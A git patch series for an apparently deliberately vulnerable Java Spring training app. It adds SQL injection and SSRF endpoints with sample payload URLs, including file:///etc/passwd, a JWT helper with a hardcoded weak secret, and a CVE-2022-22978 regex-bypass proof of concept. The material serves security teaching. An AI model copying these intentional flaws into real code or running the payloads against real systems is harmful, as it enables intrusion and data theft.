     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/Application.java b/src/main/java/org/joychou/Application.java
index 0f04b2c8..41169b9a 100644
--- a/src/main/java/org/joychou/Application.java
+++ b/src/main/java/org/joychou/Application.java
@@ -8,7 +8,6 @@
 import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
 
 
-
 @ServletComponentScan // do filter
 @SpringBootApplication
 // @EnableEurekaClient  // 测试Eureka请打开注释，防止控制台一直有warning
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 45662e9c..9531e980 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -57,6 +57,9 @@ public String rememberMeVul(HttpServletRequest request)
 
     /**
      * Check deserialize class using black list.
+     * Or
+     * Update commons-collections to 3.2.2 or above.
+     * Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons.To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true',but you must ensure that your application does not de-serialize objects from untrusted sources.
      * <p>
      * http://localhost:8080/deserialize/rememberMe/security
      */
diff --git a/src/main/java/org/joychou/controller/Jwt.java b/src/main/java/org/joychou/controller/Jwt.java
new file mode 100644
index 00000000..522fd44a
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Jwt.java
@@ -0,0 +1,62 @@
+package org.joychou.controller;
+
+import lombok.extern.slf4j.Slf4j;
+import org.joychou.util.CookieUtils;
+import org.joychou.util.JwtUtils;
+import org.springframework.web.bind.annotation.CookieValue;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+
+/**
+ *
+ */
+@Slf4j
+@RestController
+@RequestMapping("/jwt")
+public class Jwt {
+
+    private static final String COOKIE_NAME = "USER_COOKIE";
+    /**
+     * http://localhost:8080/jwt/createToken
+     * Create jwt token and set token to cookies.
+     *
+     * @author JoyChou 2022-09-20
+     */
+    @GetMapping("/createToken")
+    public String createToken(HttpServletResponse response, HttpServletRequest request) {
+        String loginUser = request.getUserPrincipal().getName();
+        log.info("Current login user is " + loginUser);
+
+        CookieUtils.deleteCookie(response, COOKIE_NAME);
+        String token = JwtUtils.generateTokenByJavaJwt(loginUser);
+        Cookie cookie = new Cookie(COOKIE_NAME, token);
+
+        cookie.setMaxAge(86400);    // 1 DAY
+        cookie.setPath("/");
+        cookie.setSecure(true);
+        response.addCookie(cookie);
+        return "Add jwt token cookie successfully. Cookie name is USER_COOKIE";
+    }
+
+
+    /**
+     * http://localhost:8080/jwt/getName
+     * Get nickname from USER_COOKIE
+     *
+     * @author JoyChou 2022-09-20
+     * @param user_cookie cookie
+     * @return nickname
+     */
+    @GetMapping("/getName")
+    public String getNickname(@CookieValue(COOKIE_NAME) String user_cookie) {
+        String nickname = JwtUtils.getNicknameByJavaJwt(user_cookie);
+        return "Current jwt user is " + nickname;
+    }
+
+}
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index afabfe15..6682115c 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -130,6 +130,50 @@ public String jdbc_sqli_sec(@RequestParam("username") String username) {
         return result.toString();
     }
 
+
+    /**
+     * http://localhost:8080/sqli/jdbc/ps/vuln?username=joychou' or 'a'='a
+     *
+     * Incorrect use of prepareStatement. prepareStatement must use ? as a placeholder.
+     */
+    @RequestMapping("/jdbc/ps/vuln")
+    public String jdbc_ps_vuln(@RequestParam("username") String username) {
+
+        StringBuilder result = new StringBuilder();
+        try {
+            Class.forName(driver);
+            Connection con = DriverManager.getConnection(url, user, password);
+
+            if (!con.isClosed())
+                System.out.println("Connecting to Database successfully.");
+
+            String sql = "select * from users where username = '" + username + "'";
+            PreparedStatement st = con.prepareStatement(sql);
+
+            logger.info(st.toString());
+            ResultSet rs = st.executeQuery();
+
+            while (rs.next()) {
+                String res_name = rs.getString("username");
+                String res_pwd = rs.getString("password");
+                String info = String.format("%s: %s\n", res_name, res_pwd);
+                result.append(info);
+                logger.info(info);
+            }
+
+            rs.close();
+            con.close();
+
+        } catch (ClassNotFoundException e) {
+            logger.error("Sorry, can`t find the Driver!");
+            e.printStackTrace();
+        } catch (SQLException e) {
+            logger.error(e.toString());
+        }
+        return result.toString();
+    }
+
+
     /**
      * vuln code
      * http://localhost:8080/sqli/mybatis/vuln01?username=joychou' or '1'='1
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index aa76f9fe..3f9a8762 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -76,6 +76,11 @@ public String httpURLConnection(@RequestParam String url) {
     }
 
 
+    @GetMapping("/HttpURLConnection/vuln")
+    public String httpURLConnectionVuln(@RequestParam String url) {
+        return HttpUtils.HttpURLConnection(url);
+    }
+
     /**
      * The default setting of followRedirects is true.
      * UserAgent is <code>Apache-HttpClient/4.5.12 (Java/1.8.0_102)</code>.
diff --git a/src/main/java/org/joychou/util/CookieUtils.java b/src/main/java/org/joychou/util/CookieUtils.java
new file mode 100644
index 00000000..eddae0db
--- /dev/null
+++ b/src/main/java/org/joychou/util/CookieUtils.java
@@ -0,0 +1,24 @@
+package org.joychou.util;
+
+import lombok.extern.slf4j.Slf4j;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletResponse;
+
+
+@Slf4j
+public class CookieUtils {
+
+    public static boolean deleteCookie(HttpServletResponse res, String cookieName) {
+        try {
+            Cookie cookie = new Cookie(cookieName, null);
+            cookie.setMaxAge(0);
+            cookie.setPath("/");
+            res.addCookie(cookie);
+            return true;
+        } catch (Exception e) {
+            log.error(e.toString());
+            return false;
+        }
+    }
+}
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 4f608301..d0be6dd3 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -110,12 +110,17 @@ public static String URLConnection(String url) {
     }
 
 
+    /**
+     * The default setting of followRedirects is true.
+     * UserAgent is Java/1.8.0_102.
+     */
     public static String HttpURLConnection(String url) {
         try {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
             HttpURLConnection conn = (HttpURLConnection) urlConnection;
-            // Many HttpURLConnection methods can send http request, such as getResponseCode, getHeaderField
+//             conn.setInstanceFollowRedirects(false);
+//             Many HttpURLConnection methods can send http request, such as getResponseCode, getHeaderField
             InputStream is = conn.getInputStream();  // send request
             BufferedReader in = new BufferedReader(new InputStreamReader(is));
             String inputLine;
@@ -165,6 +170,13 @@ public static String okhttp(String url) throws IOException {
     }
 
 
+    /**
+     * The default setting of followRedirects is true.
+     *
+     * UserAgent is Java/1.8.0_102.
+     *
+     * @param url http request url
+     */
     public static void imageIO(String url) {
         try {
             URL u = new URL(url);
diff --git a/src/main/java/org/joychou/util/JwtUtils.java b/src/main/java/org/joychou/util/JwtUtils.java
new file mode 100644
index 00000000..3ee6c89d
--- /dev/null
+++ b/src/main/java/org/joychou/util/JwtUtils.java
@@ -0,0 +1,103 @@
+package org.joychou.util;
+
+import com.auth0.jwt.JWT;
+import com.auth0.jwt.JWTVerifier;
+import com.auth0.jwt.algorithms.Algorithm;
+import com.auth0.jwt.exceptions.JWTVerificationException;
+import io.jsonwebtoken.Claims;
+import io.jsonwebtoken.Jwts;
+import io.jsonwebtoken.SignatureAlgorithm;
+import lombok.extern.slf4j.Slf4j;
+
+import java.nio.charset.StandardCharsets;
+import java.util.Base64;
+import java.util.Date;
+
+@Slf4j
+public class JwtUtils {
+
+    private static final long EXPIRE = 1440 * 60 * 1000;  // 1440 Minutes, 1 DAY
+    private static final String SECRET = "123456";
+    private static final String B64_SECRET = Base64.getEncoder().encodeToString(SECRET.getBytes(StandardCharsets.UTF_8));
+
+    /**
+     * Generate JWT Token by jjwt (last update time: Jul 05, 2018)
+     *
+     * @author JoyChou 2022-09-20
+     * @param userId userid
+     * @return token
+     */
+    public static String generateTokenByJjwt(String userId) {
+        return Jwts.builder()
+                .setHeaderParam("typ", "JWT")   // header
+                .setHeaderParam("alg", "HS256")     // header
+                .setIssuedAt(new Date())    // token发布时间
+                .setExpiration(new Date(System.currentTimeMillis() + EXPIRE))   // token过期时间
+                .claim("userid", userId)
+                // secret在signWith会base64解码，但网上很多代码示例并没对secret做base64编码，所以在爆破key的时候可以注意下。
+                .signWith(SignatureAlgorithm.HS256, B64_SECRET)
+                .compact();
+    }
+
+    public static String getUserIdFromJjwtToken(String token) {
+        try {
+            Claims claims = Jwts.parser().setSigningKey(B64_SECRET).parseClaimsJws(token).getBody();
+            return (String)claims.get("userid");
+        } catch (Exception e) {
+            return e.toString();
+        }
+    }
+
+    /**
+     * Generate jwt token by java-jwt.
+     *
+     * @author JoyChou 2022-09-20
+     * @param nickname nickname
+     * @return jwt token
+     */
+    public static String generateTokenByJavaJwt(String nickname) {
+        return JWT.create()
+                .withClaim("nickname", nickname)
+                .withExpiresAt(new Date(System.currentTimeMillis() + EXPIRE))
+                .withIssuedAt(new Date())
+                .sign(Algorithm.HMAC256(SECRET));
+    }
+
+
+    /**
+     * Verify JWT Token
+     * @param token token
+     * @return Valid token returns true. Invalid token returns false.
+     */
+    public static Boolean verifyTokenByJavaJwt(String token) {
+        try {
+            Algorithm algorithm = Algorithm.HMAC256(SECRET);
+            JWTVerifier verifier = JWT.require(algorithm).build();
+            verifier.verify(token);
+            return true;
+        } catch (JWTVerificationException exception){
+            log.error(exception.toString());
+            return false;
+        }
+    }
+
+
+    public static String getNicknameByJavaJwt(String token) {
+        if (!verifyTokenByJavaJwt(token)) {
+            log.error("token is invalid");
+            return null;
+        }
+        return JWT.decode(token).getClaim("nickname").asString();
+    }
+
+
+    public static void main(String[] args) {
+        String jjwtToken = generateTokenByJjwt("10000");
+        System.out.println(jjwtToken);
+        System.out.println(getUserIdFromJjwtToken(jjwtToken));
+
+        String token = generateTokenByJavaJwt("JoyChou");
+        System.out.println(token);
+        System.out.println(getNicknameByJavaJwt(token));
+    }
+}
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 9d27f958..8511d5fd 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -21,6 +21,11 @@
         <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
         <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
     </p>
+
+    <P>
+        <a th:href="@{/jwt/createToken}">JWTCreateToken</a>
+        <a th:href="@{/jwt/getName}">GetUserFromJWTToken</a>
+    </P>
     <p>...</p>
     <a th:href="@{/logout}">logout</a>
 

From e4190d6213d4892d7b49cb15d016d833d011562c Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 21 Oct 2022 20:13:28 +0800
Subject: [PATCH 08/20] Add RestTemplate SSRF

---
 .../org/joychou/config/HttpServiceConfig.java | 38 ++++++++++++++++
 .../java/org/joychou/controller/SSRF.java     | 31 ++++++++++++-
 .../java/org/joychou/filter/OriginFilter.java |  2 -
 .../org/joychou/impl/HttpServiceImpl.java     | 44 +++++++++++++++++++
 .../java/org/joychou/service/HttpService.java | 11 +++++
 src/main/java/org/joychou/util/HttpUtils.java |  1 -
 src/main/java/org/joychou/util/JwtUtils.java  |  1 +
 7 files changed, 124 insertions(+), 4 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/HttpServiceConfig.java
 create mode 100644 src/main/java/org/joychou/impl/HttpServiceImpl.java
 create mode 100644 src/main/java/org/joychou/service/HttpService.java

diff --git a/src/main/java/org/joychou/config/HttpServiceConfig.java b/src/main/java/org/joychou/config/HttpServiceConfig.java
new file mode 100644
index 00000000..64477bd4
--- /dev/null
+++ b/src/main/java/org/joychou/config/HttpServiceConfig.java
@@ -0,0 +1,38 @@
+package org.joychou.config;
+
+import org.springframework.boot.web.client.RestTemplateBuilder;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.http.client.SimpleClientHttpRequestFactory;
+import org.springframework.web.client.RestTemplate;
+
+import java.io.IOException;
+import java.net.HttpURLConnection;
+
+
+class CustomClientHttpRequestFactory extends SimpleClientHttpRequestFactory {
+
+
+    @Override
+    protected void prepareConnection(HttpURLConnection connection, String httpMethod) throws IOException {
+        super.prepareConnection(connection, httpMethod);
+        // Use custom ClientHttpRequestFactory to set followRedirects false.
+        connection.setInstanceFollowRedirects(false);
+    }
+}
+
+@Configuration
+public class HttpServiceConfig {
+
+    @Bean
+    public RestTemplate restTemplateBanRedirects(RestTemplateBuilder builder) {
+        return builder.requestFactory(CustomClientHttpRequestFactory.class).build();
+    }
+
+
+    @Bean
+    public RestTemplate restTemplate(RestTemplateBuilder builder) {
+        return builder.build();
+    }
+
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 3f9a8762..72044a7a 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -2,12 +2,16 @@
 
 import org.joychou.security.SecurityUtil;
 import org.joychou.security.ssrf.SSRFException;
+import org.joychou.service.HttpService;
 import org.joychou.util.HttpUtils;
 import org.joychou.util.WebUtils;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
+import org.springframework.http.HttpHeaders;
+import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.*;
 
+import javax.annotation.Resource;
 import javax.servlet.http.HttpServletResponse;
 import java.io.*;
 import java.net.*;
@@ -23,8 +27,10 @@
 @RequestMapping("/ssrf")
 public class SSRF {
 
-    private static Logger logger = LoggerFactory.getLogger(SSRF.class);
+    private static final Logger logger = LoggerFactory.getLogger(SSRF.class);
 
+    @Resource
+    private HttpService httpService;
 
     /**
      * http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd
@@ -266,4 +272,27 @@ public String HttpSyncClients(@RequestParam("url") String url) {
     }
 
 
+    /**
+     * http://127.0.0.1:8080/ssrf/restTemplate/vuln?url=http://www.baidu.com <p>
+     * Only support HTTP protocol. <p>
+     * Redirects: GET HttpMethod follow redirects by default, other HttpMethods do not follow redirects<p>
+     * User-Agent: Java/1.8.0_102 <p>
+     */
+    @GetMapping("/restTemplate/vuln1")
+    public String RestTemplateUrlBanRedirects(String url){
+        HttpHeaders headers = new HttpHeaders();
+        headers.setContentType(MediaType.APPLICATION_JSON_UTF8);
+        return httpService.RequestHttpBanRedirects(url, headers);
+    }
+
+
+    @GetMapping("/restTemplate/vuln2")
+    public String RestTemplateUrl(String url){
+        HttpHeaders headers = new HttpHeaders();
+        headers.setContentType(MediaType.APPLICATION_JSON_UTF8);
+        return httpService.RequestHttp(url, headers);
+    }
+
+
+
 }
diff --git a/src/main/java/org/joychou/filter/OriginFilter.java b/src/main/java/org/joychou/filter/OriginFilter.java
index d57f667a..271a4562 100644
--- a/src/main/java/org/joychou/filter/OriginFilter.java
+++ b/src/main/java/org/joychou/filter/OriginFilter.java
@@ -6,8 +6,6 @@
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
-
-import org.apache.catalina.servlet4preview.http.HttpFilter;
 import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
diff --git a/src/main/java/org/joychou/impl/HttpServiceImpl.java b/src/main/java/org/joychou/impl/HttpServiceImpl.java
new file mode 100644
index 00000000..d3bbf3a1
--- /dev/null
+++ b/src/main/java/org/joychou/impl/HttpServiceImpl.java
@@ -0,0 +1,44 @@
+package org.joychou.impl;
+
+
+import org.joychou.service.HttpService;
+import org.springframework.http.HttpEntity;
+import org.springframework.http.HttpHeaders;
+import org.springframework.http.ResponseEntity;
+import org.springframework.stereotype.Service;
+import org.springframework.web.client.RestTemplate;
+import org.springframework.http.HttpMethod;
+
+import javax.annotation.Resource;
+
+@Service
+public class HttpServiceImpl implements HttpService {
+
+    @Resource
+    private RestTemplate restTemplate;
+
+    @Resource
+    private RestTemplate restTemplateBanRedirects;
+
+    /**
+     * Http request by RestTemplate. Only support HTTP protocol. <p>
+     * Redirects: GET HttpMethod follow redirects by default, other HttpMethods do not follow redirects.<p>
+     * User-Agent: Java/1.8.0_102 <p>
+     */
+    public String RequestHttp(String url, HttpHeaders headers) {
+        HttpEntity<String> entity = new HttpEntity<>(headers);
+        ResponseEntity<String> re = restTemplate.exchange(url, HttpMethod.GET, entity, String.class);
+        return re.getBody();
+    }
+
+    /**
+     * Http request by RestTemplate. Only support HTTP protocol. <p>
+     * Redirects: Disable followRedirects.<p>
+     * User-Agent: Java/1.8.0_102 <p>
+     */
+    public String RequestHttpBanRedirects(String url, HttpHeaders headers) {
+        HttpEntity<String> entity = new HttpEntity<>(headers);
+        ResponseEntity<String> re = restTemplateBanRedirects.exchange(url, HttpMethod.GET, entity, String.class);
+        return re.getBody();
+    }
+}
diff --git a/src/main/java/org/joychou/service/HttpService.java b/src/main/java/org/joychou/service/HttpService.java
new file mode 100644
index 00000000..198a5311
--- /dev/null
+++ b/src/main/java/org/joychou/service/HttpService.java
@@ -0,0 +1,11 @@
+package org.joychou.service;
+
+
+import org.springframework.http.HttpHeaders;
+
+public interface HttpService {
+
+    String RequestHttp(String url, HttpHeaders headers);
+
+    String RequestHttpBanRedirects(String url, HttpHeaders headers);
+}
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index d0be6dd3..a5b67dad 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -221,5 +221,4 @@ public static String HttpAsyncClients(String url) {
             }
         }
     }
-
 }
diff --git a/src/main/java/org/joychou/util/JwtUtils.java b/src/main/java/org/joychou/util/JwtUtils.java
index 3ee6c89d..bb33642e 100644
--- a/src/main/java/org/joychou/util/JwtUtils.java
+++ b/src/main/java/org/joychou/util/JwtUtils.java
@@ -83,6 +83,7 @@ public static Boolean verifyTokenByJavaJwt(String token) {
 
 
     public static String getNicknameByJavaJwt(String token) {
+        // If the signature is not verified, there will be security issues.
         if (!verifyTokenByJavaJwt(token)) {
             log.error("token is invalid");
             return null;

From 9acefb2b0c0d32b2cd07e83219b276f94cdb32e7 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 21 Nov 2022 18:44:54 +0800
Subject: [PATCH 09/20] add jwt

---
 java-sec-code.iml                              |  1 +
 pom.xml                                        |  6 ++++++
 src/main/java/org/joychou/controller/SSRF.java | 16 +++++++++++++++-
 3 files changed, 22 insertions(+), 1 deletion(-)

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 445cfa46..9b423c61 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -221,5 +221,6 @@
     <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.4" level="project" />
     <orderEntry type="library" name="Maven: io.jsonwebtoken:jjwt:0.9.1" level="project" />
     <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
+    <orderEntry type="library" name="Maven: cn.hutool:hutool-all:5.8.10" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index aa8e89a5..751a4b35 100644
--- a/pom.xml
+++ b/pom.xml
@@ -300,6 +300,12 @@
             <version>4.0.0</version>
         </dependency>
 
+        <dependency>
+            <groupId>cn.hutool</groupId>
+            <artifactId>hutool-all</artifactId>
+            <version>5.8.10</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 72044a7a..b4c4bde8 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -1,5 +1,6 @@
 package org.joychou.controller;
 
+import cn.hutool.http.HttpUtil;
 import org.joychou.security.SecurityUtil;
 import org.joychou.security.ssrf.SSRFException;
 import org.joychou.service.HttpService;
@@ -273,7 +274,7 @@ public String HttpSyncClients(@RequestParam("url") String url) {
 
 
     /**
-     * http://127.0.0.1:8080/ssrf/restTemplate/vuln?url=http://www.baidu.com <p>
+     * http://127.0.0.1:8080/ssrf/restTemplate/vuln1?url=http://www.baidu.com <p>
      * Only support HTTP protocol. <p>
      * Redirects: GET HttpMethod follow redirects by default, other HttpMethods do not follow redirects<p>
      * User-Agent: Java/1.8.0_102 <p>
@@ -294,5 +295,18 @@ public String RestTemplateUrl(String url){
     }
 
 
+    /**
+     * http://127.0.0.1:8080/ssrf/hutool/vuln?url=http://www.baidu.com <p>
+     * UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool<p>
+     * Redirects: Do not follow redirects <p>
+     *
+     * @param url url
+     * @return contents of url
+     */
+    @GetMapping("/hutool/vuln")
+    public String hutoolHttp(String url){
+        return HttpUtil.get(url);
+    }
+
 
 }

From da04cccd476a5a620c2c508360512e601580ddaf Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 16 Jan 2023 15:36:03 +0800
Subject: [PATCH 10/20] add CVE-2022-22978

---
 README.md                                     |  1 +
 README_zh.md                                  |  1 +
 .../java/org/joychou/controller/Dotall.java   | 32 +++++++++++++++++++
 .../security/CsrfAccessDeniedHandler.java     |  2 +-
 .../joychou/security/WebSecurityConfig.java   |  5 ++-
 src/main/java/org/joychou/util/HttpUtils.java |  4 +--
 6 files changed, 41 insertions(+), 4 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Dotall.java

diff --git a/README.md b/README.md
index edfda09c..c7e886a6 100644
--- a/README.md
+++ b/README.md
@@ -30,6 +30,7 @@ Sort by letter.
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
+- [CVE-2022-22978](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
 - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
 - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
diff --git a/README_zh.md b/README_zh.md
index 111c8be3..549766a5 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -26,6 +26,7 @@ joychou/joychou123
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
+- [CVE-2022-22978](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
 - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
 - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java)
diff --git a/src/main/java/org/joychou/controller/Dotall.java b/src/main/java/org/joychou/controller/Dotall.java
new file mode 100644
index 00000000..d2dfc49d
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Dotall.java
@@ -0,0 +1,32 @@
+package org.joychou.controller;
+
+
+
+import java.net.URLDecoder;
+import java.nio.charset.StandardCharsets;
+import java.util.regex.Pattern;
+
+
+/**
+ * Spring Security CVE-2022-22978 <p>
+ * <a href="https://github.com/JoyChou93/java-sec-code/wiki/CVE-2022-22978">漏洞相关wiki</a>
+ * @author JoyChou @2023-01-212
+ */
+
+public class Dotall {
+
+
+    /**
+     * <a href="https://github.com/spring-projects/spring-security/compare/5.5.6..5.5.7">官方spring-security修复commit记录</a>
+     * 漏洞描述：h
+     */
+    public static void main(String[] args) throws Exception{
+        Pattern vuln_pattern = Pattern.compile("/black_path.*");
+        Pattern sec_pattern = Pattern.compile("/black_path.*", Pattern.DOTALL);
+
+        String poc = URLDecoder.decode("/black_path%0a/xx", StandardCharsets.UTF_8.toString());
+        System.out.println("Poc: " + poc);
+        System.out.println("Not dotall: " + vuln_pattern.matcher(poc).matches());    // false，非dotall无法匹配\r\n
+        System.out.println("Dotall: " + sec_pattern.matcher(poc).matches());         // true，dotall可以匹配\r\n
+    }
+}
diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
index 2e1df795..4f8ad327 100644
--- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
+++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
@@ -29,7 +29,7 @@ public void handle(HttpServletRequest request, HttpServletResponse response,
 
         response.setContentType(MediaType.TEXT_HTML_VALUE); // content-type: text/html
         response.setStatus(HttpServletResponse.SC_FORBIDDEN); // 403 forbidden
-        response.getWriter().write("CSRF check failed by JoyChou.");  // response contents
+        response.getWriter().write("403 forbidden by JoyChou.");  // response contents
     }
 
 }
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index 5e8c3697..9d90c698 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -62,13 +62,16 @@ protected void configure(HttpSecurity http) throws Exception {
                 .ignoringAntMatchers(csrfExcludeUrl)  // 不进行csrf校验的uri，多个uri使用逗号分隔
                 .csrfTokenRepository(new CookieCsrfTokenRepository());
         http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler());
-        // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());«
+
+        // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
 
         http.cors();
 
         // spring security login settings
         http.authorizeRequests()
                 .antMatchers("/css/**", "/js/**").permitAll() // permit static resources
+                // CVE-2022-22978漏洞代码
+                .regexMatchers("/black_path.*").denyAll()    // 如果正则匹配到/black_path，则forbidden
                 .anyRequest().authenticated().and() // any request authenticated except above static resources
                 .formLogin().loginPage("/login").permitAll() // permit all to access /login page
                 .successHandler(new LoginSuccessHandler())
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index a5b67dad..2c248b29 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -146,7 +146,7 @@ public static String HttpURLConnection(String url) {
     public static String Jsoup(String url) {
         try {
             Document doc = Jsoup.connect(url)
-                    //.followRedirects(false)
+//                    .followRedirects(false)
                     .timeout(3000)
                     .cookie("name", "joychou") // request cookies
                     .execute().parse();
@@ -164,7 +164,7 @@ public static String Jsoup(String url) {
      */
     public static String okhttp(String url) throws IOException {
         OkHttpClient client = new OkHttpClient();
-        // client.setFollowRedirects(false);
+//         client.setFollowRedirects(false);
         com.squareup.okhttp.Request ok_http = new com.squareup.okhttp.Request.Builder().url(url).build();
         return client.newCall(ok_http).execute().body().string();
     }

From 9d66a8885aaf198a29602c7de1e45fba5a11a715 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 17 Jan 2023 14:40:29 +0800
Subject: [PATCH 11/20] add alibaba security purple team recruitment

---
 README.md    | 2 +-
 README_zh.md | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index c7e886a6..52642169 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 
 Java sec code is a very powerful and friendly project for learning Java vulnerability code.
 
-[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md)
+[中文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md) 😋[Alibaba Security Purple Team Recruitment](https://talent.alibaba.com/off-campus-position/937731?trace=qrcode_share)
 
 ## Introduce
 
diff --git a/README_zh.md b/README_zh.md
index 549766a5..70e68837 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -2,7 +2,7 @@
 
 对于学习Java漏洞代码来说，`Java Sec Code`是一个非常强大且友好的项目。
 
-[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md)
+[英文文档](https://github.com/JoyChou93/java-sec-code/blob/master/README.md) 😋[阿里集团安全紫军招聘](https://talent.alibaba.com/off-campus-position/937731?trace=qrcode_share)
 
 ## 介绍
 

